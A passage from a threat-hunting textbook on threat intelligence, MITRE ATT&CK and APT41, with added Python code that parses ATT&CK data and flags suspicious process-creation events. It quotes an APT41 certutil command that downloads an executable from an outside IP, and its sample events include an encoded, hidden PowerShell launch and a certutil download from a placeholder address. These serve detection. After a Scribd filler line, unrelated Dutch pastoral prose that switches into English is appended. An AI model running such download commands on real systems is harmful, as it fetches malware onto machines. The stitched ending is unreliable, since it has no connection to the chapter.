good reason to establish one or more threat hunt plays relevant to a threat
group of interest, APT41, one of many active threat actors.

Threat intelligence is an important source that provides threat hunters with
critical insights into the current threat landscape. In our scenario,
it is the threat intelligence team sharing the information about the relevance
of a threat group, APT41, as one of the threat actors to track. Let us further
describe threat intelligence and how it relates to threat hunting.

2.3 Cyber Threat Intelligence

Cyber threat intelligence refers to the information collected and processed,
and the knowledge established, around cyber threats by internal and external
sources to better understand and evaluate the threats that have targeted, are
currently targeting, or will target an organization, allowing it to take actions
and make informed decisions promptly. Cyber threat intelligence tries to help
answer simple but important questions such as: who would attack an
organization, and how?

These are the questions that threat intelligence analysts try to answer. To do
so, they research, analyze and compile a wide range of internal and external
information to identify short-term (present) and long-term (future) attacks
and threats. Threat intelligence analysts then share the compiled version with
the broader organization, including threat hunters.

2.3.1 Threat Intelligence Types

Based on its content and how it is consumed, threat intelligence is divided
into four types: strategic, tactical, technical, and operational. The four types
are shown in Figure 2.2 and described hereafter.

Strategic threat intelligence supplies a high-level presentation of
the threat landscape suitable for executives, focusing on the impact of
threat execution.
Operational threat intelligence provides context about threats and
actors, such as their nature, intent, malicious activities and geopolitical
background, suitable for security management. Operational
threat intelligence provides threat hunters with the contextual
information that helps them build and execute relevant hunt plays.
Tactical threat intelligence supplies details on TTPs suitable for the
SOC team in general and threat hunters in particular.
Technical threat intelligence supplies specific IOCs such as IP
addresses, hashes, and URLs suitable for machine-based consumption.
Due to the nature of the information it provides, technical threat
intelligence has a short lifespan.

Figure 2.2 Threat Intelligence Types


Threat hunters should have an overall knowledge of the four threat
intelligence types, focus on operational and tactical threat intelligence,
and have easy access to technical threat intelligence.

Let us now look into how to view and process tactical and technical threat
intelligence based on their level of complexity, through the lens of the
pyramid of pain model.

2.3.2 The Pyramid of Pain

The pyramid of pain model
(http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html),
shown in Figure 2.3, takes a complexity-driven perspective on tactical and
technical threat intelligence. The higher you go on the pyramid, the harder it
gets to uncover the attacker's characteristics. For example, locating and
tracking the activities of an IP address is generally easier than uncovering
the use of techniques such as invoking rundll32.exe to execute a malicious
loader.

A mature threat hunting practice would focus on the top three layers of the
pyramid of pain (network/host artifacts, tools and TTPs) to get the best value
out of threat intelligence and achieve higher levels of maturity. The bottom
three layers of the pyramid (hash values, IP addresses and domain names) are
associated with IOCs mainly consumed for security monitoring purposes.
Threat hunters would still use these IOCs, but that should not be the focus of
the threat hunting practice as a whole.

Figure 2.3 Pyramid of Pain

In addition to threat intelligence, situational awareness is key to creating
relevant hypotheses. Let us dig more into the concept of situational
awareness.

2.4 Security Situational Awareness

In the context of cyber security, situational awareness refers to understanding
1. the business, 2. the supporting technology environment that security
professionals, such as hunters, aim to protect and 3. the internal and external
cyber threats associated with this environment.

Maintaining good situational awareness is critical to making informed
security decisions when selecting, deploying and operating threat prevention,
detection, and response controls. In the context of threat hunting, situational
awareness is key to creating and conducting relevant and effective threat
hunts.

To gain better situational awareness, threat hunters should establish
knowledge of:

The organization's business, including the market it operates in and the
products and services it offers to customers.
The technology services delivered by the organization to its internal and
external consumers, for example, user directory or remote access
services.
Systems and applications used, including but not limited to the
operating systems and software used.
The location of these systems and applications, for example, the ones
hosted in an on-premises data center or ones delivered by a cloud
service provider as infrastructure as a service (IaaS), platform as a
service (PaaS) or software as a service (SaaS).
Existing prevention, detection and response security controls, including
but not limited to network security, application security, endpoint
security, infrastructure security, identity management and vulnerability
management.
Data generated by the different systems and applications, where it is
stored and how it can be accessed.
The threat landscape associated with the environment, including relevant
threat actors and TTPs that could be used or enhanced to start an attack
or establish a compromise.
Previous and current security incidents.

The combination of 1. good situational awareness, 2. the threat hunter's
experience and 3. a structured and well-resourced practice is key to reaching
a good level of threat hunting maturity.

There are situations in which the threat hunter's experience might hinder the
productivity and effectiveness of threat hunts. This is due to cognitive biases,
which refer to how a person's perception of information is influenced by their
own experience and preferences. Let us discuss this in more detail in the next
section.

2.5 Cognitive Bias Challenges

According to the Handbook of Evolutionary Psychology, a cognitive bias is a
systematic pattern of deviation from norm or rationality in judgment.
Experiencing cognitive biases results from how our brains are wired to
simplify our complex world.

We all have exhibited, and will exhibit, one form or another of cognitive bias.
Security professionals such as threat hunters should be aware of how
cognitive biases impact their decisions and judgment. There is a long list of
cognitive biases. The following are three critical ones that threat hunters
should watch for and try to overcome when designing and conducting hunts.

Confirmation bias: refers to the tendency to search for or interpret
information in a way that confirms one's preconceptions and to discredit
information that does not support the initial opinion. Threat hunters
should not fall into confirmation bias by ignoring or discarding
information or suggestions contradicting their hypothesis. Avoiding it saves
them time and ensures that their threat hunts are relevant and optimal and
that the outcome of the hypothesis testing reflects the actual situation.
Present bias: refers to preferring a smaller, immediate reward over a
more significant future one in a trade-off situation. Threat hunters
should not settle for the first evidence they uncover. Instead, they should
expand the scope of the hunt to uncover the full extent of the threat.
Overconfidence bias: refers to overestimating one's actual ability to
perform a task successfully. Threat hunters should continuously seek to
gain more experience and knowledge to be accurately self-confident
rather than overestimate their capabilities. The overconfidence bias
might stop threat hunters from seeking advice or support from other
experienced colleagues or external subject matter experts, thinking they
know it all.

At the beginning of the chapter, we referred to MITRE ATT&CK in our
threat hunt play that addresses the threat scenario. For example, we
referenced MITRE ATT&CK in the background section and a couple of
MITRE ATT&CK techniques (T1059.001 and T1059.003) under the threat
techniques. What is MITRE ATT&CK, and how useful is it to threat hunters?
We explore this in the next section.

2.6 MITRE ATT&CK

MITRE ATT&CK (https://attack.mitre.org) stands for MITRE Adversarial
Tactics, Techniques, and Common Knowledge (ATT&CK). MITRE
ATT&CK is a popular reference for creating security monitoring detection
rules and driving threat hunting hypotheses. It provides comprehensive
matrices of attack and threat tactics and techniques that are updated twice a
year. Version 10, published in October 2021, has four matrices: Enterprise,
Mobile, Industrial Control System, and Containers.

Version 10 of MITRE ATT&CK Enterprise
(https://attack.mitre.org/resources/updates/updates-october-2021) contains 14
Tactics, 188 Techniques, 379 Sub-techniques and 129 Groups. The 14 tactics
are Reconnaissance, Resource Development, Initial Access, Execution,
Persistence, Privilege Escalation, Defense Evasion, Credential Access,
Discovery, Lateral Movement, Collection, Command and Control,
Exfiltration and Impact.

ATT&CK describes the following elements:

Tactics: represent the "why" of an ATT&CK technique or sub-
technique. A tactic is the adversary's tactical goal, i.e., the reason for
performing an action, for example, exfiltrating data.
Techniques: represent "how" an adversary achieves a tactical goal by
performing an action. For example, an adversary may dump credentials
to achieve credential access. The threat hunt play example includes
technique T1059, Command and Scripting Interpreter, under the
Execution tactic.
Sub-techniques: a more specific description of the adversarial behavior used
to achieve a goal. They describe behavior at a lower level than a
technique. The threat hunt play example includes two sub-techniques:
T1059.001, Command and Scripting Interpreter: PowerShell, and
T1059.003, Command and Scripting Interpreter: Windows Command
Shell.
Procedures: the specific implementation the adversary uses for
techniques or sub-techniques. The threat hunt play example includes a
procedure per sub-technique: "APT41 leveraged PowerShell to deploy
malware families in victims' environments" is the procedure listed under
the Command and Scripting Interpreter: PowerShell sub-technique, and
"APT41 used cmd.exe /c to execute commands on remote machines. APT41
used a batch file to install persistence for the Cobalt Strike BEACON
loader" is the procedure under the Windows Command Shell sub-technique.

The threat intelligence community tracks threat actors and, in many cases,
maps their activities to the MITRE ATT&CK tactics and techniques.
Organizations and threat hunters can use this information to plan their hunts.
For example, APT41 (Mandiant - https://www.mandiant.com/resources/apt-groups)
is a group that is also known as Wicked Panda (CrowdStrike -
https://adversary.crowdstrike.com/en-US/adversary/wicked-panda), Group 72
(Cisco Talos - https://blogs.cisco.com/security/talos/threat-spotlight-group-72)
and BRONZE ATLAS (SecureWorks -
https://www.secureworks.com/research/threat-profiles/bronze-atlas).

Threat hunters can use the MITRE ATT&CK as a starting point to investigate
the group, understanding and visualizing the known techniques and
procedures that the group deploys.
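To make that starting point concrete, the following is an added example (not code from the book) of pulling a group's known techniques and procedures out of the STIX 2.1 bundle in which MITRE publishes ATT&CK (the enterprise-attack.json file). In the real bundle an intrusion-set object such as APT41 is linked to attack-pattern objects through "uses" relationships, and the relationship's description text is the procedure example; revoked or deprecated objects remain in the bundle and must be skipped. The miniature bundle embedded here is constructed by hand, so its object ids are placeholders and only a handful of techniques are present, but the field names match the published data, and the same function would work over the full file.

```python
"""Extract an ATT&CK group's known techniques, grouped by tactic, from a STIX bundle.

Added example for this chapter, not the book's code. The object types and
field names (intrusion-set, attack-pattern, relationship/uses,
kill_chain_phases, external_references) are those of MITRE's published
enterprise-attack.json; the bundle below is a constructed miniature.
"""
import json
from collections import defaultdict

# Constructed miniature of the ATT&CK Enterprise bundle. Only fields the code
# reads are included; object ids other than the ATT&CK external_ids are placeholders.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--example",
    "objects": [
        {"type": "intrusion-set", "id": "intrusion-set--g0096", "name": "APT41",
         "aliases": ["APT41", "Wicked Panda", "BRONZE ATLAS"],
         "external_references": [{"source_name": "mitre-attack", "external_id": "G0096"}]},
        {"type": "attack-pattern", "id": "attack-pattern--t1059-001",
         "name": "PowerShell", "x_mitre_is_subtechnique": True,
         "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}],
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1059.001"}]},
        {"type": "attack-pattern", "id": "attack-pattern--t1059-003",
         "name": "Windows Command Shell", "x_mitre_is_subtechnique": True,
         "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}],
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1059.003"}]},
        {"type": "attack-pattern", "id": "attack-pattern--t1105",
         "name": "Ingress Tool Transfer", "x_mitre_is_subtechnique": False,
         "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}],
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1105"}]},
        {"type": "attack-pattern", "id": "attack-pattern--t1003",
         "name": "OS Credential Dumping", "x_mitre_is_subtechnique": False,
         "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}],
         "external_references": [{"source_name": "mitre-attack", "external_id": "T1003"}]},
        {"type": "relationship", "id": "relationship--1", "relationship_type": "uses",
         "source_ref": "intrusion-set--g0096", "target_ref": "attack-pattern--t1059-001",
         "description": "APT41 leveraged PowerShell to deploy malware families."},
        {"type": "relationship", "id": "relationship--2", "relationship_type": "uses",
         "source_ref": "intrusion-set--g0096", "target_ref": "attack-pattern--t1059-003",
         "description": "APT41 used cmd.exe /c to execute commands on remote machines."},
        {"type": "relationship", "id": "relationship--3", "relationship_type": "uses",
         "source_ref": "intrusion-set--g0096", "target_ref": "attack-pattern--t1105",
         "description": "APT41 used certutil to download additional files."},
        # Revoked relationships stay in the bundle and must be ignored.
        {"type": "relationship", "id": "relationship--4", "relationship_type": "uses",
         "source_ref": "intrusion-set--g0096", "target_ref": "attack-pattern--t1003",
         "revoked": True},
    ],
})


def attack_id(obj):
    """Return the ATT&CK external id (G0096, T1059.001, ...) of a STIX object, or None."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def group_techniques(bundle_json, group_id):
    """Map tactic -> sorted (technique id, name, procedure) for every live 'uses'
    relationship that originates from the group with the given ATT&CK id."""
    objects = json.loads(bundle_json)["objects"]
    by_id = {o["id"]: o for o in objects}
    group = next((o for o in objects
                  if o["type"] == "intrusion-set" and attack_id(o) == group_id), None)
    if group is None:
        raise KeyError(f"group {group_id} not in bundle")
    result = defaultdict(list)
    for rel in objects:
        if rel["type"] != "relationship" or rel.get("relationship_type") != "uses":
            continue
        if rel.get("revoked") or rel.get("x_mitre_deprecated"):
            continue
        if rel["source_ref"] != group["id"]:
            continue
        tech = by_id.get(rel["target_ref"])
        if tech is None or tech["type"] != "attack-pattern" or tech.get("revoked"):
            continue
        for phase in tech.get("kill_chain_phases", []):
            if phase["kill_chain_name"] == "mitre-attack":
                result[phase["phase_name"]].append(
                    (attack_id(tech), tech["name"], rel.get("description", "")))
    return {tactic: sorted(items) for tactic, items in result.items()}


if __name__ == "__main__":
    for tactic, techniques in group_techniques(SAMPLE_BUNDLE, "G0096").items():
        print(tactic)
        for tid, name, procedure in techniques:
            print(f"  {tid} {name}: {procedure}")
```

Run against the real bundle, the output is the raw material for the technique and procedure rows of a hunt play: the hunter picks the tactics that matter for the hunt field and pairs each technique with the data sources that can evidence it.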

Note

MITRE ATT&CK is updated twice a year; therefore, for recent information
on threat actor activities, the organization should have access to threat
intelligence research services delivered by an internal threat intelligence team
or outsourced to reliable threat intelligence providers.

In some cases, and depending on the organization's maturity, business, and
size, the threat hunter might perform the role of the threat intelligence
analyst.

Figure 2.4, generated using the Enterprise MITRE ATT&CK Navigator
(https://mitre-attack.github.io/attack-
navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0096%2FG00
enterprise-layer.json), shows the tactics and techniques relevant to APT41
highlighted in blue.

Figure 2.4 MITRE ATT&CK Tactics and Techniques for APT41

To conduct their malicious activities, the threat group of interest, APT41,
deploys many techniques and tools. According to Mandiant
(https://www.mandiant.com/resources/apt-groups), APT41 has used at least
46 different code families and tools to target organizations in 14 countries.
APT41 often relies on spear-phishing emails with attachments such as
compiled HTML (.chm) files to initially compromise their victims. Once
inside, APT41 can leverage more sophisticated tactics, techniques and
procedures (TTPs) to deploy additional malware.

If identified as one of the threat actors of interest, the security monitoring and
threat hunting teams would look for APT41 tactics, techniques, and tools
commonly used by the group. Threat hunters, in particular, would establish
hypotheses around the existence of traces of APT41 activities in the network
and search for the tactics and tools used by the group to prove the hypotheses.

The MITRE ATT&CK website (https://attack.mitre.org/groups/G0096) lists
techniques and tools used by the group. The list can be used as a reference to
create or tune detection rules and build threat hunting hypotheses. For
example, the threat hunter can create a hypothesis supported by searching for
"T1105 Ingress Tool Transfer", a MITRE ATT&CK technique used by the
group. The APT41 group has used certutil, a built-in Windows program, to
download additional files during an intrusion. The following shows an
example of how the group used the certutil command-line tool to download
an executable file, 2.exe, during an attack uncovered by Mandiant
(https://www.mandiant.com/resources/apt41-initiates-global-intrusion-
campaign-using-multiple-exploits):

certutil -urlcache -split -f http://91.208.184[.]78/2.exe
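The hunt play in section 2.2.2 names Security event 4688 and Sysmon event 1 as the process creation data sources for its two T1059 sub-techniques, and the certutil command above is a T1105 procedure that lands in those same events. The following added example (not code from the book, from MITRE or from Mandiant) shows one way a hunter can turn the play's procedures into a query over process creation events: it normalises the two event types, whose field names differ, and flags PowerShell invocations that are encoded, hidden or remotely spawned, cmd.exe /c launched by a remote-execution parent, and certutil -urlcache downloads. The records are constructed for the example; the host names, user names and the 198.51.100.23 address are placeholders, and the list of parent processes taken to indicate a remotely initiated command is an assumption that a real hunt would tune to its own environment.

```python
"""Hunt query over process creation events for the play's procedures.

Added example for this chapter, not the book's code. It normalises Sysmon
event 1 and Security event 4688 records (field names follow the real events;
the records themselves are constructed) and flags executions matching
T1059.001 (PowerShell), T1059.003 (cmd.exe /c on remote hosts) and
T1105 (certutil -urlcache download).
"""
import re
import shlex
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str     # full path of the created process
    cmdline: str
    parent: str    # full path of the parent process
    source: str    # "sysmon:1" or "security:4688"


def normalise(record):
    """Map raw Sysmon 1 / Security 4688 field names onto a ProcEvent."""
    if record.get("EventID") == 1:          # Sysmon process creation
        return ProcEvent(record["Computer"], record["User"], record["Image"],
                         record["CommandLine"], record["ParentImage"], "sysmon:1")
    if record.get("EventID") == 4688:       # Windows Security auditing
        # 4688 carries the command line only when the "Include command line in
        # process creation events" policy is enabled, so it may be empty.
        return ProcEvent(record["Computer"], record["SubjectUserName"],
                         record["NewProcessName"], record.get("CommandLine", ""),
                         record.get("ParentProcessName", ""), "security:4688")
    raise ValueError(f"unsupported event id {record.get('EventID')}")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


# Assumed parents that indicate a remotely initiated command (WMI provider host,
# service control manager, WinRM host); tune this list per environment.
REMOTE_PARENTS = {"wmiprvse.exe", "services.exe", "wsmprovhost.exe"}
ENC_FLAG = re.compile(r"-e(c|nc(odedcommand)?)?$")   # -e, -ec, -enc, -encodedcommand
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def match_procedures(ev):
    """Return the ATT&CK ids whose hunt logic the event satisfies."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent)
    try:
        args = [a.lower() for a in shlex.split(ev.cmdline, posix=False)]
    except ValueError:                      # unbalanced quotes in the command line
        args = ev.cmdline.lower().split()
    if img in ("powershell.exe", "pwsh.exe"):
        encoded = any(ENC_FLAG.match(a) for a in args)
        hidden = "hidden" in args and any(a.startswith("-w") for a in args)
        if encoded or hidden or parent in REMOTE_PARENTS:
            hits.append("T1059.001")
    if img == "cmd.exe" and "/c" in args and parent in REMOTE_PARENTS:
        hits.append("T1059.003")
    if img == "certutil.exe" and "-urlcache" in args and URL_RE.search(ev.cmdline):
        hits.append("T1105")
    return hits


def hunt(records):
    """Run the play over raw records; return (host, user, technique, cmdline) findings."""
    findings = []
    for rec in records:
        ev = normalise(rec)
        for tid in match_procedures(ev):
            findings.append((ev.host, ev.user, tid, ev.cmdline))
    return findings


# Constructed sample records; hosts, users and the 198.51.100.23 address are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "ws01.corp.example", "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
     "ParentImage": "C:\\Windows\\explorer.exe"},                  # interactive admin script
    {"EventID": 1, "Computer": "ws01.corp.example", "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEAQQA=",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},   # T1059.001
    {"EventID": 4688, "Computer": "dc01.corp.example", "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami > \\\\ws01\\c$\\out.txt",
     "ParentProcessName": "C:\\Windows\\System32\\services.exe"},   # T1059.003
    {"EventID": 4688, "Computer": "ws02.corp.example", "SubjectUserName": "bob",
     "NewProcessName": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://198.51.100.23/2.exe",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe"},        # T1105, same shape as above
    {"EventID": 4688, "Computer": "ws02.corp.example", "SubjectUserName": "bob",
     "NewProcessName": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -verify C:\\temp\\vendor.cer",
     "ParentProcessName": "C:\\Windows\\explorer.exe"},             # legitimate certutil use
]

if __name__ == "__main__":
    for host, user, tid, cmd in hunt(SAMPLE_EVENTS):
        print(f"{tid:10} {host:18} {user:12} {cmd}")
```

The first and last records are deliberately benign so the query has something to not match: an interactive administrator running a script, and certutil used for its intended purpose. The value of the event 4688 normalisation is that a hunter learns early whether command-line auditing is actually enabled; without it, the T1105 and encoded-PowerShell checks have nothing to inspect, which is exactly the "is the hypothesis testable with the data available" question from section 2.2.3.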

Including all the APT41 techniques in a single hunt play would not be
practical. Some techniques are not relevant to the environment, while others
are. You might end up combining the techniques that apply to the
environment based on the tactic they fall under and the procedures used. In our
threat hunt play example, we are looking into techniques in which
PowerShell has been used to execute the threat.

Building and operating a structured threat hunt practice involves more than
creating hunting plays. A framework that describes how to manage a hunting
practice is needed. Let us look into the topic of building a framework for
threat hunting.

2.7 Frameworks
In general, a framework is a structure that outlines the organization of a
system (in our case, the threat hunting practice) and facilitates the proper
arrangement of components that the framework identifies.

2.7.1 Scenario

Imagine you are asked to develop the outline of a threat hunting framework
to drive a structured threat hunting practice. What areas would the framework
cover, and what level of detail would you include?

2.7.2 Threat Hunting Framework

A standard threat hunting framework covers the following areas:

Definition of threat hunting

Threat hunting is a human-centric security practice that takes a proactive
approach to uncovering threats that evaded detection tools such as automated,
rule- and signature-based security systems, or threats that have been detected
but dismissed or undermined by humans.

Definition of important threat hunting concepts

A hypothesis is a proposition that is consistent with known data but has
been neither verified nor shown to be false.
Situational awareness refers to understanding the business, the
supporting technology environment and the internal and external cyber
threats associated with this environment.
A threat actor refers to a person, a group or an organization driven by
various motives to carry out malicious activity.

The threat hunting process

We need to document the threat hunting process, such as in the example that
will shortly follow. The threat hunting process documents the following: title,
description, owner, roles involved, resources, triggers, exit criteria and a
detailed workflow. Let us look at the example.

Title: Structured threat hunting process

Description: Unlike alert-driven investigations, structured threat
hunting starts with identifying threats, followed by a hypothesis to verify
(hypothesis-driven investigation). A hunt starts with a "what-if
question", followed by an initial lead or clue, but then hunters take many
twists and turns. The threat hunting process describes the following
phases:
    Preparation
    Execution
    Communication

Owner: Threat Hunter (or the threat hunting manager in the case of
large organizations)

Roles involved:
    The threat intelligence analyst provides compiled reports that
    describe relevant threats for hunters to track down
    The threat hunter prepares, executes, and optimizes threat hunts
    The threat hunter hands over the incident to the incident response
    team when proving the hypothesis and/or uncovering other threats
    during a threat hunt
    The platform engineer addresses questions and issues in relation to
    systems used by the hunter

Resources:
    Threat hunt play template
    Threat hunt report template
    Threat hunt playbook
    Systems and Tools: List of systems and tools used by hunters to
    conduct their hunt expeditions, such as ones used for:
        Storing, searching and correlating events
        Executing queries on endpoints
        Capturing and retrieving network flows
        Capturing packets
        Sandboxing of artifacts (e.g. file and URL)
        Managing threat intelligence
        Managing incident cases

Triggers:
    Threat intelligence information
    Threat modeling
    Red/purple team exercise
    Analysis of past cyber security incidents

Exit Criteria:
    It is not possible for the hunter to gain access to data required for
    the threat hunt play
    Reporting an incident to the incident response team based on
    proving the hypothesis
    No threats were found during a threat hunt

Workflow:
    Preparation: This phase, shown in Figure 2.5, involves the
    preparation work: identifying the triggering events,
    deciding if a new hunt would be introduced, creating the play and
    ensuring that the required data and tools for the hunt are available
    and suitable.

Figure 2.5 Threat Hunting Process – Preparation Phase

    Execution: This phase, shown in Figure 2.6, involves running the
    threat hunt expedition, uncovering the threat and its scope and
    creating an incident ticket if the hypothesis is proven.

Figure 2.6 Threat Hunting Process – Execution Phase

    Communication: This phase, shown in Figure 2.7, involves
    documenting the threat hunt expedition and handing over the
    findings to the corresponding teams: security monitoring, threat
    intelligence and vulnerability management.

Figure 2.7 Threat Hunting Process – Communication Phase


Following a process ensures that threat hunts are efficient, thorough, and
successful. The above breaks down the steps of the high-level threat hunting
process presented in Chapter 1 and shown in Figure 2.8.

Figure 2.8 High-Level Threat Hunting Process

When documenting a process, you can use the following structure for a
process template:

Title: The title of the process
Description: The purpose and scope of the process
Roles: The owner of the process as well as the job roles responsible for
executing the process
Resources: The resources (such as technologies and templates) that are
required to execute the process
Process trigger(s): The event or series of events that must have
occurred to trigger the process
Exit criteria: The conditions for the process to be considered complete
Workflow: Describes the steps and assigns roles responsible for
executing the steps

Note

The threat hunting process can be much more involved, especially in the
execution phase when multiple hunters are involved in conducting and
supporting large-scale threat hunting expeditions.

Threat hunting role and responsibilities

The Responsible, Accountable, Consulted and Informed (RACI) model in
Figure 2.9 shows a set of tasks mapped to different roles in security
operations, including the role of threat hunting. The list of tasks represents
activities that relate directly or indirectly to threat hunting. For example,
onboarding a data source is not the responsibility of the threat hunter role, but
threat hunters need to be informed, since not having the required data
available in a suitable format would hinder their work. On the other hand, it is
the responsibility of threat hunters to identify and request the onboarding of
data sources they need in case the system owner or the platform administrator
did not onboard them successfully.

Figure 2.9 Threat Hunting RACI Model


Another random document with
no related content on Scribd:
sjorden ze nog, tot Dirk, in zwaren knoop, ’t touw-end
om wagenkant vastrukte. Hijgend en blazend, paf van
smoorhitte, die als wiegelend vuur op hun kleeren
bleef zengen, en hun zonnebronzige zweetkoppen
rood-vlekkig, bevlamd van inspanning, onkenbaar
verwrong, stonden de kerels achter ’t krat van den
hoogen wagen, waar de wind nu geen vat meer op
had.—

Stom even keken ze voor zich uit.—Toen, met ’n


forschen ruk boorde Kees de steek vork diep in ’t hooi.

—’n Gos-meroakel daa-tie stoan ’tmet.… kaik.… wâ


lailek die skaif hangt!..

Dirk kroop op ’t voorkrat, klom op z’n bankje,


ingedoken [228]onder ’t berghooge goudhooi, z’n
schonken en kop òverhuivend. In beukerenden ruk en
pracht-spannenden spierzwel, de pooten pezig
gekromd, de flanken gestrekt, kop in snuiving
laaggebukt, hoefklakkerde ’t paard op den grintdijk
áán. In waggel kraak-hortte de wagen voort van den
dijk.

Kees en Ouë Gerrit hingen zich aan de binten van ’t


achterkrat, met armen vastgehaakt, half-sleurend
langs spanrand en touwkruis, om den berg te stuiten
in z’n snel-sullenden gang van schuinen dijk. Zoo
hobbelde de wagen voort, angstig scheef-hellend den
straatweg op, klaar, om bij ’n dommen zwenk neer te
smakken, breed-uit op gloei-blinkenden klinkerweg
van polder.—
[Inhoud]

III.

In den middag stonden de hooiwagens weer leeg op


den dijk. De wind was uitgevlaagd, brieste nu koeler in
den zwijmenden polder, en zilver wolkspel, veerig
blank, doorpluimde in ontzaglijke zwierlijn, ’t
hemelruim. Achter, bij horizon, stapelden wolktronen,
paars en violet in dampig en vochtig goudlicht. Van
alle kanten uit, achter dammen, dijken en paden,
waggelden de hooiwagens weg, als ’n zwoegend
versleep van duinen.

Gelijk ’n blinkende witte baan, lag gloeizanderige


klinkerweg naakt te blakeren tusschen ’t groen. ’n
Adem van zeezoelte koelde soms over ’t land en in
mistig violet slankten de dorpstorentjes op paarse kim.
Wijde middagrust, zwijmelloomde en suizelde over
klaverveld en bouwgrond. Meer bijeengedromd in de
middaghitte groepten de droomrige trage koetjes in
vacht-pracht, en smijige huidplooiing. Wat
watermolentjes wiekerden, wìekerden, en bestoven
van luwe dampen, schitterden de slooten of effenden
met kroos, in dof prachtgroen, pasteltintig omstreeld
van innig licht.—

Om zeven uur nog stonden Dirk en Kees den laatsten


wagen op te laden, nu vlugger en rustiger werkend, in
den [229]koelenden luchtstroom en stillen aangloei van
zonnerood, tusschen den avondlijken val van ritslige
zuchten en polderstilte, eindloos.—
Luidlooze groei van schaduwleven was over ’t land
getrokken. Gebroken kleurval dampte òp in wazig
zonnerood. Graasgeluid van koeien raspte zacht door
de weien en blaatgekerm klaagde éven over dijken
áán, als ver kindergeween.

In pastoralen zang verklonken van heel vèr, soms


even, menschenstemmen vaaglijk, en hoog van
hooiwagens, door den avondrooden polder. En
roerloos, de weien verklankten de werkersstemmen
als zang in den avondval.

Kweelig vogelgekwinkel, zacht als in den ochtend,


jubelde rond en lichte muschpiepjes stipten ongedurig
nog blanke dag-geruchtjes tusschen oneindige lucht
en vlakte.—In ’t westen zwierden blank-beschuimde
wolkjes, als ’n vlucht zilvermeeuwen en blanke tortels,
verdwaalde zwerm in zonnedaal.

Goud-geel en rood omvloeide ’t stedeke Wiereland in


zomeravondbrand, met z’n havenwoel, schepen,
kleurig lichtspel, purperglanzig achter verren
boomendrom en molen.

Huisjes, met oud-rood en hel vurig dak, walmden in


laten gloed, in wolkerig avondgoud, bij enkele hoeken,
in zacht-wondren brand de krotjes verguldend als
blinkende kluistertjes.—

The flame-red of summer evening broke trails of light in painterly smears through a tangle of little houses, askew, crooked, weathered and broken, yet from afar ringed together, with their yellow-ochred gables and gleaming little windows, lit splendidly, magically, in the sun-red. On one side of the polder toward Lemper, the haystacks rose up in wonder-still red sorcery of magic fire. The hay hovered, red-cradled, in anxious-holy glow. Violet, the cast shadows crept like extinguished fire along the feet of the stacks, with the grass-sea in last sunning beneath, strange yellow-green now, in the sun's descent. Row upon row, the haystacks stood wondering there in the red sun-sorcery, and more anxiously, in a death-creep, shadow-violet climbed up one side, quenched the hay-blond, the gold-glow, the grass, in slow ascent.

Above the little town, a view's length away, the sky stood in bright-red fire. Cloud-fortresses with gold-lit arched bridges and red-glowing pillars drifted in a yellow-ochre sea of light. Gates of flame arched high, beneath which troops of horses and rider-figures came galloping out in red flight of flame, blaring on bright-copper trumpets the fire together out of the evening skies.

They raced, they came trotting on, foam-flecked, dust-covered, quivered about with glow, one gallop of riders out of the flame-realm of red evening blaze, toward the fortresses, over golden bridges, through colorful gates and silver-green halls. In red-gold vapor their steeds rushed, with snorting, quivering nostrils, through ruin-realms of sparking violet.

Banners of fire and glow in mist-play streamed out under burning flame-gates, and again and again, in fiercer tumble of light, burnt-out red beams and stones crashed with crackle and spark-spatter into the purple-blue expanse, extinguished, graying dead-still.

So the sky-play drifted above the little town, summer-evening blaze of the polder, soundless race and sparkling clarion of horses and riders, out of the fire toward the fortresses, surging onward in a throng through glow and vapor, and yet standing still in hesitation. At last the throng turned to stone, an apotheosis-procession paling from orange into purple mist, the horses' heads alone still fierily cindered, in a stare; still for a moment to be seen the panting, snuffing nostrils, in a nervous tremor of fear. And above their heads, glow-spears of graying riders, raised aslant toward the flame-light, in rigid posture, gray-vague, dying away in mist of purple.

Beneath the clouding, hesitant throng, the little town glowed its evening in quieter red, holy with glow. A swarm of little roofs, in the sun's sinking, was consumed in gleam-red; blue shutters, green little doors and windows glowed away for a moment, softly dying in light. Windowpanes in red gleam flamed with fire, quiet holy fire, and bright red, and purple and silver-slaty the little roofs glowed, their lines flowing into the shifting brio of the sky above the harbor trees; trees that grew gigantic against the late light. A haze of tints steamed out ever lower over the little town, and pale-gold the harbor bustle died away in endless stillness, murmured through by evening fall.

The polder caught the last glow, in the blond ear-gleam of rye. Stalks glimmered and a dewy haze of light steamed over the dying, hushing land. The haystacks stood burnt out in purple dullness and the grass wavered yellow-tender under a swoon of hay-scent and flower-sweetness.

